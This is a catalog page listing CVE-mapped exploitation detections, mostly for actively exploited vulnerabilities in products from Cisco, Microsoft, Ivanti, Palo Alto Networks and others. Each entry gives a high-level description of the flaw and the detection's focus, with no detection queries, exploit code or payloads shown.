Vulnerability Detections
CVE-mapped detections for known-exploited, weaponized, and proof-of-concept vulnerabilities. Each ships ready-to-deploy KQL & SPL detection logic. Filter by vendor, product, CVSS, CWE and exploitation status.
- CVE-2026-20253 KEV
CVE-2026-20253: Splunk Enterprise Missing Authentication for Critical Function
Detects exploitation attempts targeting CVE-2026-20253, a missing authentication vulnerability (CWE-306) in Splunk Enterprise. This KEV-listed vulnerability allows unauthenticated access to critical Splunk functions. Attackers may leverage this to execute searches, exfiltrate data, or manipulate Splunk configurations without valid credentials.
vendor: Splunk product: Enterprise cwe: CWE-306 disclosed: Jun 18, 2026unscoredwrite-up soon - CVE-2026-48907 KEV
Widget Factory Joomla Content Editor Improper Access Control (CVE-2026-48907)
Detects exploitation of CVE-2026-48907, an improper access control vulnerability (CWE-284) in the Joomla Content Editor (JCE) plugin by Widget Factory. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass access controls, potentially enabling unauthorized file uploads, remote code execution, or administrative actions within Joomla CMS installations.
vendor: Widget Factory product: Joomla Content Editor cwe: CWE-284 disclosed: Jun 16, 2026unscoredwrite-up soon - CVE-2026-20262 KEV
Cisco Catalyst SD-WAN Manager Path Traversal Exploitation
Detects exploitation attempts targeting CVE-2026-20262, a path traversal vulnerability (CWE-22) in Cisco Catalyst SD-WAN Manager. Active exploitation has been confirmed by CISA KEV. Attackers can traverse directory boundaries via crafted HTTP requests to access sensitive files outside the web root, potentially exposing credentials, configuration data, or enabling further compromise of the SD-WAN management plane.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-22 disclosed: Jun 15, 2026unscoredwrite-up soon - CVE-2026-54420 KEV
LiteSpeed cPanel Plugin UNIX Symbolic Link (Symlink) Following Vulnerability
Detects exploitation of CVE-2026-54420, a UNIX symbolic link (symlink) following vulnerability in the LiteSpeed cPanel Plugin. Attackers with local access can create malicious symlinks to read or overwrite files outside the intended directory, potentially leading to privilege escalation or unauthorized file access on cPanel-managed hosting servers. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: LiteSpeed product: cPanel Plugin cwe: CWE-61 disclosed: Jun 15, 2026unscoredwrite-up soon - CVE-2026-35273 KEV
Oracle PeopleSoft PeopleTools Missing Authentication for Critical Function (CVE-2026-35273)
CVE-2026-35273 is a missing authentication vulnerability (CWE-306) in Oracle PeopleSoft Enterprise PeopleTools. An unauthenticated remote attacker can access critical PeopleSoft functions without authentication, potentially leading to unauthorized data access, privilege escalation, or full system compromise. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Oracle product: PeopleSoft Enterprise PeopleTools cwe: CWE-306 disclosed: Jun 12, 2026unscoredwrite-up soon - CVE-2026-10520 KEV
Ivanti Sentry OS Command Injection Exploitation (CVE-2026-10520)
Detects exploitation attempts targeting CVE-2026-10520, an OS command injection vulnerability (CWE-78) in Ivanti Sentry. This vulnerability is actively exploited in the wild (CISA KEV) and allows unauthenticated or authenticated attackers to inject operating system commands through Ivanti Sentry's administrative or API interfaces, potentially leading to full system compromise. Ivanti Sentry acts as a gateway for enterprise mobile device management, making it a high-value target for threat actors seeking persistent access to corporate infrastructure.
vendor: Ivanti product: Sentry cwe: CWE-78 disclosed: Jun 11, 2026unscoredwrite-up soon - CVE-2026-11645 KEV
Google Chromium V8 Out-of-Bounds Read and Write Vulnerability (CVE-2026-11645)
Detects exploitation attempts targeting CVE-2026-11645, an out-of-bounds read and write vulnerability in Google Chromium's V8 JavaScript engine. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation can lead to arbitrary code execution in the context of the browser process, enabling sandbox escape, credential theft, and further compromise.
vendor: Google product: Chromium V8 cwe: CWE-787, CWE-125 disclosed: Jun 9, 2026unscoredwrite-up soon - CVE-2026-20245 KEV
Cisco Catalyst SD-WAN Manager Improper Output Encoding Exploitation
Detects exploitation attempts targeting CVE-2026-20245, an improper encoding or escaping of output vulnerability (CWE-116) in Cisco Catalyst SD-WAN Manager. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to perform privilege escalation or inject malicious content through improperly encoded output. Detection focuses on anomalous authentication patterns, unexpected privilege changes, API abuse, and suspicious management plane activity against SD-WAN Manager instances.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-116 disclosed: Jun 9, 2026unscoredwrite-up soon - CVE-2026-7473 KEV
Arista EOS Incomplete Comparison Authentication Bypass (CVE-2026-7473)
Detects exploitation attempts targeting CVE-2026-7473, an incomplete comparison vulnerability (CWE-1023) in Arista Extensible Operating System (EOS). This flaw allows attackers to bypass authentication or authorization checks due to missing comparison factors, potentially enabling unauthorized access to network device management interfaces. The vulnerability is actively exploited in the wild (CISA KEV). Detection focuses on anomalous management-plane access patterns, unexpected SSH/API sessions, and configuration changes on Arista EOS devices.
vendor: Arista product: Extensible Operating System cwe: CWE-1023 disclosed: Jun 9, 2026unscoredwrite-up soon - CVE-2026-42271 KEV
BerriAI LiteLLM Command Injection (CVE-2026-42271)
Detects exploitation of CVE-2026-42271, a command injection vulnerability in BerriAI LiteLLM. An attacker who can reach the LiteLLM API or admin interface may inject OS commands that execute under the LiteLLM process context, leading to remote code execution. The vulnerability is tracked under CWE-78 (OS Command Injection) and CWE-77 (Command Injection) and is listed as actively exploited in CISA KEV.
vendor: BerriAI product: LiteLLM cwe: CWE-78, CWE-77 disclosed: Jun 8, 2026unscoredwrite-up soon - CVE-2026-50751 KEV
Check Point Security Gateway Improper Authentication (CVE-2026-50751)
Detects exploitation of CVE-2026-50751, an improper authentication vulnerability (CWE-287) in Check Point Security Gateway affecting deprecated IKEv1 VPN protocol. This vulnerability is actively exploited in the wild (CISA KEV) and may allow unauthenticated attackers to bypass authentication controls on the VPN gateway. Detection focuses on anomalous IKEv1 negotiation patterns, authentication bypass indicators, and suspicious gateway access following failed or malformed IKE exchanges.
vendor: Check Point product: Security Gateway cwe: CWE-287 disclosed: Jun 8, 2026unscoredwrite-up soon - CVE-2026-28318 KEV
SolarWinds Serv-U Uncontrolled Resource Consumption (CVE-2026-28318)
Detects exploitation of CVE-2026-28318, an uncontrolled resource consumption vulnerability (CWE-400) in SolarWinds Serv-U. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and allows attackers to exhaust server resources, leading to denial of service conditions. Detection focuses on abnormal connection patterns, resource exhaustion indicators, and anomalous request volumes targeting Serv-U services.
vendor: SolarWinds product: Serv-U cwe: CWE-400 disclosed: Jun 5, 2026unscoredwrite-up soon - CVE-2026-45247 KEV
Mirasvit Full Page Cache Warmer Deserialization RCE (CVE-2026-45247)
Detects exploitation of CVE-2026-45247, a deserialization of untrusted data vulnerability in the Mirasvit Full Page Cache Warmer Magento extension. Successful exploitation allows remote attackers to execute arbitrary code by sending crafted serialized PHP objects to vulnerable endpoints. This CVE is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Mirasvit product: Mirasvit Full Page Cache Warmer cwe: CWE-502 disclosed: Jun 3, 2026unscoredwrite-up soon - CVE-2022-0492 KEV
Linux Kernel cgroup v1 release_agent Privilege Escalation (CVE-2022-0492)
CVE-2022-0492 is a Linux kernel vulnerability (CWE-287/CWE-862) in the cgroup v1 release_agent mechanism. A local unprivileged user can exploit improper capability checks to write to /sys/fs/cgroup/*/release_agent and execute arbitrary commands as root, enabling container escape and full host compromise. This vulnerability is listed on CISA KEV, indicating active exploitation in the wild.
vendor: Linux product: Kernel cwe: CWE-287, CWE-862 disclosed: Jun 2, 2026unscoredwrite-up soon - CVE-2024-21182 KEV
Oracle WebLogic Server CVE-2024-21182 Exploitation Attempt
Detects exploitation attempts targeting CVE-2024-21182, an unspecified vulnerability in Oracle WebLogic Server. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Oracle WebLogic Server is a high-value target for threat actors due to its prevalence in enterprise Java EE environments. Exploitation may enable remote code execution, unauthorized data access, or server compromise.
vendor: Oracle product: WebLogic Server disclosed: Jun 1, 2026unscoredwrite-up soon - CVE-2026-47140 Public PoC PoC
CVE-2026-47140 — vm2 Builtin Denylist Bypass via process/inspector Leads to Host RCE
Detects exploitation of CVE-2026-47140, a critical sandbox escape in the npm vm2 package (versions <= 3.11.3). Attackers bypass the builtin module denylist using process and inspector/promises references to execute arbitrary code on the host Node.js process. CVSS 10.0. PoC is publicly available.
vendor: npm product: vm2 cwe: CWE-693 disclosed: May 29, 202610.0 criticalwrite-up soon - CVE-2026-47208 Public PoC PoC
CVE-2026-47208: vm2 Sandbox Breakout via Promise Species
Detects exploitation of CVE-2026-47208, a critical sandbox escape vulnerability in the vm2 Node.js library (versions <= 3.11.3). Attackers can abuse the Promise species pattern to break out of the vm2 sandbox and execute arbitrary code on the host. This vulnerability has a CVSS score of 10.0 and a public PoC is available.
vendor: npm product: vm2 cwe: CWE-913 disclosed: May 29, 202610.0 criticalwrite-up soon - CVE-2026-0257 KEV
Palo Alto Networks PAN-OS Authentication Bypass (CVE-2026-0257)
Detects exploitation attempts of CVE-2026-0257, an authentication bypass vulnerability in Palo Alto Networks PAN-OS caused by improper reliance on cookies for security decisions (CWE-565). An attacker can manipulate session cookies to bypass authentication controls on PAN-OS management interfaces or VPN endpoints. This vulnerability is confirmed exploited in the wild (CISA KEV).
vendor: Palo Alto Networks product: PAN-OS cwe: CWE-565 disclosed: May 29, 2026unscoredwrite-up soon - CVE-2026-45321 KEV
TanStack Router Unspecified Vulnerability Exploitation
Detects potential exploitation of CVE-2026-45321, an unspecified vulnerability in TanStack Router that has been added to the CISA Known Exploited Vulnerabilities catalog. TanStack Router is a type-safe routing library for React applications. Given KEV status, active exploitation in the wild is confirmed. Detection focuses on anomalous web application behavior, suspicious client-side routing patterns, unexpected server-side request patterns, and post-exploitation indicators consistent with JavaScript framework exploitation.
vendor: TanStack product: TanStack disclosed: May 27, 2026unscoredwrite-up soon - CVE-2026-48027 KEV
Nx Console Embedded Malicious Code Execution (CVE-2026-48027)
CVE-2026-48027 describes an embedded malicious code vulnerability (CWE-506) in Nx Console, a popular VS Code and JetBrains IDE extension for managing Nx monorepos. A compromised or trojanized version of Nx Console contains backdoored code that executes at extension load time within the developer IDE process, enabling attacker-controlled behavior including credential harvesting, reverse shells, or supply chain lateral movement into CI/CD pipelines. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild. Detection focuses on anomalous process spawning from IDE extension host processes, unexpected network connections originating from VS Code or JetBrains runtimes, and suspicious file writes consistent with embedded malicious payloads.
vendor: Nx product: Nx Console cwe: CWE-506 disclosed: May 27, 2026unscoredwrite-up soon - CVE-2026-8398 KEV
Daemon Tools Lite Embedded Malicious Code (CVE-2026-8398)
CVE-2026-8398 is a supply chain compromise affecting Daemon Tools Lite, where threat actors embedded malicious code (CWE-506) within the software distribution. Installations of the trojanized version may result in backdoor access, credential theft, or lateral movement from hosts running the compromised software. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Daemon product: Daemon Tools Lite cwe: CWE-506 disclosed: May 27, 2026unscoredwrite-up soon - CVE-2026-48172 KEV
LiteSpeed cPanel Plugin Privilege Escalation (CVE-2026-48172)
Detects exploitation of CVE-2026-48172, a privilege escalation vulnerability in the LiteSpeed cPanel Plugin (CWE-266: Incorrect Privilege Assignment). Attackers with low-privileged cPanel access can leverage the plugin's improper privilege handling to elevate to root or administrative system access. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: LiteSpeed product: cPanel Plugin cwe: CWE-266 disclosed: May 26, 2026unscoredwrite-up soon - CVE-2026-9082 KEV
Drupal Core SQL Injection Exploitation (CVE-2026-9082)
Detects exploitation attempts targeting CVE-2026-9082, a SQL injection vulnerability in Drupal Core. This KEV-listed vulnerability allows attackers to inject malicious SQL via crafted HTTP requests, potentially leading to unauthorized data access, credential theft, or remote code execution via stacked queries. Active exploitation has been observed in the wild.
vendor: Drupal product: Core cwe: CWE-89 disclosed: May 22, 2026unscoredwrite-up soon - CVE-2025-34291 KEV
CVE-2025-34291: Langflow Origin Validation Error Exploitation
Detects exploitation of CVE-2025-34291, an origin validation error (CWE-346) in Langflow that allows attackers to bypass origin checks. This vulnerability is actively exploited in the wild (CISA KEV) and may enable unauthorized access to Langflow API endpoints, flow execution, or administrative functions by bypassing cross-origin restrictions.
vendor: Langflow product: Langflow cwe: CWE-346 disclosed: May 21, 2026unscoredwrite-up soon - CVE-2026-34926 KEV
Trend Micro Apex One Directory Traversal Exploitation (CVE-2026-34926)
Detects exploitation attempts targeting CVE-2026-34926, a directory traversal vulnerability (CWE-23) in Trend Micro Apex One (On-Premise). This KEV-listed vulnerability allows unauthenticated or low-privileged attackers to traverse directory boundaries via crafted HTTP requests to the Apex One management server, potentially enabling arbitrary file read or write operations. Active exploitation has been observed in the wild.
vendor: Trend Micro product: Apex One cwe: CWE-23 disclosed: May 21, 2026unscoredwrite-up soon - CVE-2008-4250 KEV
MS08-067 NetAPI Buffer Overflow Exploitation Attempt (CVE-2008-4250)
CVE-2008-4250 is a critical buffer overflow vulnerability in the Windows Server service (netapi32.dll) affecting Microsoft Windows XP, 2000, 2003, Vista, and Server 2008. Exploitation via a specially crafted RPC request to the NetpwPathCanonicalize function allows unauthenticated remote code execution as SYSTEM. This vulnerability was exploited by the Conficker worm and remains listed in CISA's Known Exploited Vulnerabilities catalog. Detection focuses on suspicious SMB/RPC activity, NetAPI service anomalies, and post-exploitation indicators including lateral movement and payload staging.
vendor: Microsoft product: Windows cwe: CWE-94 disclosed: May 20, 2026unscoredwrite-up soon - CVE-2009-1537 KEV
Microsoft DirectX NULL Byte Overwrite Vulnerability (CVE-2009-1537)
CVE-2009-1537 is a NULL byte overwrite vulnerability in Microsoft DirectX (quartz.dll) that can be exploited via a maliciously crafted QuickTime media file. Successful exploitation allows remote code execution in the context of the logged-on user. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Addressed in MS09-028.
vendor: Microsoft product: DirectX disclosed: May 20, 2026unscoredwrite-up soon - CVE-2009-3459 KEV
Adobe Acrobat and Reader Heap-Based Buffer Overflow (CVE-2009-3459)
Detects exploitation of a heap-based buffer overflow vulnerability in Adobe Acrobat and Reader (CVE-2009-3459). This CISA KEV vulnerability allows attackers to execute arbitrary code via a crafted PDF file. Exploitation typically results in AcroRd32.exe or Acrobat.exe spawning unexpected child processes, making unusual network connections, or writing executable payloads to disk.
vendor: Adobe product: Acrobat and Reader cwe: CWE-119 disclosed: May 20, 2026unscoredwrite-up soon - CVE-2010-0249 KEV
Microsoft Internet Explorer Use-After-Free Vulnerability (CVE-2010-0249)
CVE-2010-0249 is a use-after-free vulnerability (CWE-416) in Microsoft Internet Explorer that allows remote attackers to execute arbitrary code via a specially crafted web page. This vulnerability was actively exploited in the wild (Operation Aurora) and is listed in CISA's Known Exploited Vulnerabilities catalog. Exploitation typically involves a malicious HTML/JavaScript page that triggers memory corruption through manipulated DOM objects, enabling arbitrary code execution in the context of the logged-on user.
vendor: Microsoft product: Internet Explorer cwe: CWE-416 disclosed: May 20, 2026unscoredwrite-up soon - CVE-2010-0806 KEV
CVE-2010-0806 Microsoft Internet Explorer Use-After-Free Exploitation
Detects exploitation of CVE-2010-0806, a use-after-free vulnerability in Microsoft Internet Explorer. This vulnerability allows remote attackers to execute arbitrary code via a crafted web page. It is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in the wild.
vendor: Microsoft product: Internet Explorer cwe: CWE-399 disclosed: May 20, 2026unscoredwrite-up soon - CVE-2026-41091 KEV
Microsoft Defender Link Following Privilege Escalation (CVE-2026-41091)
Detects exploitation of CVE-2026-41091, a link-following vulnerability (CWE-59) in Microsoft Defender that allows attackers to follow symbolic links or junction points to access or overwrite privileged files. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to privilege escalation or arbitrary file manipulation in the context of the Defender service.
vendor: Microsoft product: Defender cwe: CWE-59 disclosed: May 20, 2026unscoredwrite-up soon - CVE-2026-45498 KEV
Microsoft Defender Denial of Service Vulnerability (CVE-2026-45498)
CVE-2026-45498 is a Denial of Service vulnerability in Microsoft Defender. Exploitation can cause Defender to crash, hang, or become unresponsive, effectively disabling endpoint protection on affected hosts. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may leverage this to disable security tooling prior to follow-on intrusion activity.
vendor: Microsoft product: Defender disclosed: May 20, 2026unscoredwrite-up soon - CVE-2026-42897 KEV
Microsoft Exchange Server Cross-Site Scripting (XSS) Exploitation
Detects exploitation attempts targeting CVE-2026-42897, a Cross-Site Scripting (XSS) vulnerability in Microsoft Exchange Server. This KEV-listed vulnerability allows attackers to inject malicious scripts into Exchange web interfaces, potentially leading to session hijacking, credential theft, or further lateral movement within the environment. Detection focuses on anomalous HTTP requests to Exchange OWA/ECP endpoints containing XSS payloads, unexpected script execution from Exchange processes, and suspicious web request patterns indicative of active exploitation.
vendor: Microsoft product: Microsoft cwe: CWE-79 disclosed: May 15, 2026unscoredwrite-up soon - CVE-2026-20182 KEV
Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20182)
Detects exploitation attempts of CVE-2026-20182, an authentication bypass vulnerability (CWE-287) in the Cisco Catalyst SD-WAN Controller. This KEV-listed vulnerability allows unauthenticated remote attackers to bypass authentication mechanisms and gain unauthorized access to the SD-WAN management plane. Successful exploitation can lead to full network fabric compromise, configuration tampering, and lateral movement across SD-WAN-connected sites.
vendor: Cisco product: Catalyst SD-WAN cwe: CWE-287 disclosed: May 14, 2026unscoredwrite-up soon - CVE-2026-42208 KEV
BerriAI LiteLLM SQL Injection Exploitation (CVE-2026-42208)
Detects exploitation attempts targeting a SQL injection vulnerability in BerriAI LiteLLM (CVE-2026-42208, CWE-89). LiteLLM is a widely deployed LLM proxy/gateway; successful exploitation allows unauthenticated or authenticated attackers to manipulate backend database queries, potentially exfiltrating API keys, user data, model configurations, and spend tracking records. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: BerriAI product: LiteLLM cwe: CWE-89 disclosed: May 8, 2026unscoredwrite-up soon - CVE-2026-6973 KEV
CVE-2026-6973: Ivanti EPMM Improper Input Validation Exploitation
Detects exploitation attempts targeting CVE-2026-6973, an improper input validation vulnerability in Ivanti Endpoint Manager Mobile (EPMM). This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to bypass authentication or execute unauthorized actions against the EPMM management interface.
vendor: Ivanti product: Endpoint Manager Mobile (EPMM) cwe: CWE-20 disclosed: May 7, 2026unscoredwrite-up soon - CVE-2026-0300 KEV
Palo Alto Networks PAN-OS Out-of-bounds Write (CVE-2026-0300)
Detects exploitation attempts targeting CVE-2026-0300, an out-of-bounds write vulnerability (CWE-787) in Palo Alto Networks PAN-OS. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to execute arbitrary code, crash the device, or escalate privileges on affected PAN-OS appliances. Detection focuses on anomalous management plane activity, unexpected process crashes, memory corruption indicators, and suspicious inbound traffic patterns targeting PAN-OS management interfaces.
vendor: Palo Alto Networks product: PAN-OS cwe: CWE-787 disclosed: May 6, 2026unscoredwrite-up soon - CVE-2026-31431 KEV
Linux Kernel Incorrect Resource Transfer Between Spheres (CVE-2026-31431)
CVE-2026-31431 is a Linux Kernel vulnerability classified as CWE-669 (Incorrect Resource Transfer Between Spheres). The flaw allows improper transfer of resources across security boundaries within the kernel, potentially enabling privilege escalation or unauthorized memory access. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers with local access may exploit this to escalate privileges to root or escape container boundaries.
vendor: Linux product: Kernel cwe: CWE-669 disclosed: May 1, 2026unscoredwrite-up soon - CVE-2026-41940 KEV
CVE-2026-41940: WebPros cPanel & WHM / WP2 Missing Authentication for Critical Function
CVE-2026-41940 is an actively exploited missing authentication vulnerability (CWE-306) in WebPros cPanel & WHM and WP2 (WordPress Squared). Unauthenticated remote attackers can invoke critical administrative functions without valid credentials, enabling account takeover, malicious plugin installation, privilege escalation, and full server compromise. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: WebPros product: cPanel & WHM and WP2 (WordPress Squared) cwe: CWE-306 disclosed: Apr 30, 2026unscoredwrite-up soon - CVE-2024-1708 KEV
ConnectWise ScreenConnect Path Traversal (CVE-2024-1708)
Detects exploitation of CVE-2024-1708, a path traversal vulnerability in ConnectWise ScreenConnect versions prior to 23.9.8. Attackers can traverse outside the intended directory to read, write, or execute arbitrary files on the host. This vulnerability is actively exploited in the wild and listed on CISA KEV. It is commonly chained with CVE-2024-1709 (authentication bypass) to achieve unauthenticated remote code execution.
vendor: ConnectWise product: ScreenConnect cwe: CWE-22 disclosed: Apr 28, 2026unscoredwrite-up soon - CVE-2026-32202 KEV
CVE-2026-32202 Microsoft Windows Protection Mechanism Failure
Detects exploitation of CVE-2026-32202, a Microsoft Windows Protection Mechanism Failure vulnerability (CWE-693) listed in CISA KEV. This vulnerability allows attackers to bypass security controls in Windows, potentially enabling privilege escalation, defense evasion, or code execution. Detection focuses on anomalous process behavior, security feature bypass indicators, and suspicious Windows API usage patterns consistent with protection mechanism circumvention.
vendor: Microsoft product: Windows cwe: CWE-693 disclosed: Apr 28, 2026unscoredwrite-up soon - CVE-2024-57726 KEV
SimpleHelp Missing Authorization Vulnerability (CVE-2024-57726)
CVE-2024-57726 is a missing authorization vulnerability (CWE-862) in SimpleHelp remote support software versions 5.5.7 and earlier. This CISA KEV-listed vulnerability allows unauthenticated or low-privileged attackers to bypass authorization controls, potentially enabling unauthorized access to administrative functions, file system traversal, or remote code execution on systems running the SimpleHelp server. Active exploitation has been observed in the wild.
vendor: SimpleHelp product: SimpleHelp cwe: CWE-862 disclosed: Apr 24, 2026unscoredwrite-up soon - CVE-2024-57728 KEV
SimpleHelp Path Traversal Vulnerability (CVE-2024-57728)
Detects exploitation of CVE-2024-57728, a path traversal vulnerability (CWE-22) in SimpleHelp remote support software versions 5.5.7 and earlier. Attackers can traverse directory boundaries to read arbitrary files from the server, potentially exposing credentials, configuration files, and sensitive system data. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SimpleHelp product: SimpleHelp cwe: CWE-22 disclosed: Apr 24, 2026unscoredwrite-up soon - CVE-2024-7399 KEV
Samsung MagicINFO 9 Server Path Traversal and Arbitrary File Upload
Detects exploitation of CVE-2024-7399, a path traversal and unrestricted file upload vulnerability in Samsung MagicINFO 9 Server. Successful exploitation allows unauthenticated or low-privileged attackers to upload arbitrary files outside the intended directory, potentially leading to remote code execution. This CVE is actively exploited in the wild (CISA KEV).
vendor: Samsung product: MagicINFO 9 Server cwe: CWE-22, CWE-434 disclosed: Apr 24, 2026unscoredwrite-up soon - CVE-2026-39987 KEV
Marimo Remote Code Execution via Missing Authentication (CVE-2026-39987)
CVE-2026-39987 is a critical remote code execution vulnerability in the Marimo reactive notebook framework caused by missing authentication (CWE-306) for critical server-side functions. An unauthenticated remote attacker can invoke kernel execution endpoints to run arbitrary Python code in the context of the Marimo server process. This vulnerability is actively exploited in the wild and listed on the CISA KEV catalog.
vendor: Marimo product: Marimo cwe: CWE-306 disclosed: Apr 23, 2026unscoredwrite-up soon - CVE-2026-33825 KEV
CVE-2026-33825 - Microsoft Defender Insufficient Access Control Exploitation
Detects exploitation attempts targeting CVE-2026-33825, an insufficient granularity of access control vulnerability (CWE-1220) in Microsoft Defender. This KEV-listed vulnerability allows attackers to bypass Defender access controls, potentially disabling protections, modifying exclusions, or tampering with security configurations without appropriate privilege levels.
vendor: Microsoft product: Defender cwe: CWE-1220 disclosed: Apr 22, 2026unscoredwrite-up soon - CVE-2023-27351 KEV
CVE-2023-27351 - PaperCut NG/MF Improper Authentication Exploitation
Detects exploitation attempts targeting CVE-2023-27351, an improper authentication vulnerability (CWE-287) in PaperCut NG/MF print management software. This CISA KEV-listed vulnerability allows unauthenticated attackers to bypass authentication controls, potentially enabling unauthorized access to the PaperCut administration interface and sensitive print management data. Threat actors have actively exploited PaperCut vulnerabilities in the wild for initial access and lateral movement.
vendor: PaperCut product: NG/MF cwe: CWE-287 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2024-27199 KEV
JetBrains TeamCity Relative Path Traversal (CVE-2024-27199)
Detects exploitation of CVE-2024-27199, a relative path traversal vulnerability in JetBrains TeamCity on-premises. Unauthenticated attackers can traverse directory paths in the TeamCity web server to access restricted endpoints and files outside the intended web root, potentially leading to information disclosure or authentication bypass chained with CVE-2024-27198.
vendor: JetBrains product: TeamCity cwe: CWE-23 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2025-2749 KEV
Kentico Xperience Path Traversal and Arbitrary File Upload (CVE-2025-2749)
Detects exploitation of CVE-2025-2749, a path traversal and unrestricted file upload vulnerability in Kentico Xperience CMS. Attackers can traverse directory boundaries to write arbitrary files — including web shells — to locations outside the intended upload path, enabling remote code execution on the hosting server. This CVE is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: Kentico product: Kentico Xperience cwe: CWE-22, CWE-434 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2025-32975 KEV
Quest KACE SMA Improper Authentication Exploitation Detected
Detects exploitation attempts against CVE-2025-32975, an improper authentication vulnerability (CWE-287) in Quest KACE Systems Management Appliance (SMA). This KEV-listed vulnerability allows attackers to bypass authentication controls, potentially enabling unauthorized access to the SMA management interface and downstream managed endpoints. Successful exploitation could lead to full appliance compromise and lateral movement across managed systems.
vendor: Quest product: KACE Systems Management Appliance (SMA) cwe: CWE-287 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2025-48700 KEV
Zimbra Collaboration Suite XSS Exploitation (CVE-2025-48700)
Detects exploitation of a stored or reflected cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This KEV-listed vulnerability allows attackers to inject malicious scripts into the Zimbra web client, potentially leading to session hijacking, credential theft, or further lateral movement within the organization. XSS in webmail platforms is frequently exploited by threat actors to steal session tokens and pivot to email account compromise.
vendor: Synacor product: Zimbra Collaboration Suite (ZCS) cwe: CWE-79 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2026-20122 KEV
Cisco Catalyst SD-WAN Manager Privileged API Abuse (CVE-2026-20122)
Detects exploitation of CVE-2026-20122, a critical vulnerability in Cisco Catalyst SD-WAN Manager involving incorrect use of privileged APIs (CWE-648). This KEV-listed flaw allows attackers to invoke privileged API endpoints without proper authorization, potentially enabling unauthorized configuration changes, credential harvesting, or full SD-WAN infrastructure takeover. Active exploitation has been observed in the wild per CISA Emergency Directive ED-26-03.
vendor: Cisco product: Catalyst SD-WAN Manger cwe: CWE-648 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2026-20128 KEV
Cisco Catalyst SD-WAN Manager Storing Passwords in a Recoverable Format (CVE-2026-20128)
CVE-2026-20128 affects Cisco Catalyst SD-WAN Manager and involves storing passwords in a recoverable format (CWE-257). An attacker with local or network access to the SD-WAN Manager may be able to extract plaintext or weakly-obfuscated credentials from configuration files, databases, or memory. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation could lead to credential theft enabling lateral movement, further network compromise, or full SD-WAN infrastructure takeover.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-257 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2026-20133 KEV
Cisco Catalyst SD-WAN Manager Sensitive Information Exposure (CVE-2026-20133)
Detects exploitation attempts targeting CVE-2026-20133, a CWE-200 information disclosure vulnerability in Cisco Catalyst SD-WAN Manager that allows unauthorized actors to access sensitive configuration and credential data. This vulnerability is actively exploited in the wild (CISA KEV) and may be leveraged to pivot into SD-WAN infrastructure.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-200 disclosed: Apr 20, 2026unscoredwrite-up soon - CVE-2026-34197 KEV
Apache ActiveMQ Improper Input Validation (CVE-2026-34197)
Detects exploitation of CVE-2026-34197, an improper input validation vulnerability (CWE-20/CWE-94) in Apache ActiveMQ that has been added to the CISA Known Exploited Vulnerabilities catalog. Successful exploitation may allow remote attackers to execute arbitrary code or inject malicious content via crafted messages or broker connections. ActiveMQ's OpenWire protocol and web console are common attack surfaces for this class of vulnerability.
vendor: Apache product: ActiveMQ cwe: CWE-20, CWE-94 disclosed: Apr 16, 2026unscoredwrite-up soon - CVE-2009-0238 KEV
Microsoft Office Remote Code Execution (CVE-2009-0238)
CVE-2009-0238 is a remote code execution vulnerability in Microsoft Office (addressed in MS09-009) caused by improper handling of specially crafted Excel files, leading to arbitrary code execution in the context of the logged-on user. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog and has been actively exploited in the wild via malicious Office documents delivered through phishing campaigns.
vendor: Microsoft product: Office cwe: CWE-94 disclosed: Apr 14, 2026unscoredwrite-up soon - CVE-2026-32201 KEV
Microsoft SharePoint Server Improper Input Validation (CVE-2026-32201)
Detects exploitation of CVE-2026-32201, an improper input validation vulnerability in Microsoft SharePoint Server. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to send crafted HTTP requests to SharePoint endpoints to bypass input validation controls, potentially enabling unauthorized access, remote code execution, or data exfiltration. CWE-20 class vulnerabilities in SharePoint have historically been leveraged for initial access and lateral movement in enterprise environments.
vendor: Microsoft product: SharePoint Server cwe: CWE-20 disclosed: Apr 14, 2026unscoredwrite-up soon - CVE-2012-1854 KEV
CVE-2012-1854 - Microsoft VBA Insecure Library Loading (DLL Hijacking)
Detects exploitation of CVE-2012-1854, a DLL hijacking vulnerability in Microsoft Visual Basic for Applications (VBA). Attackers can place a malicious DLL in a directory searched before the legitimate library path, causing Office applications loading VBA to execute attacker-controlled code. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
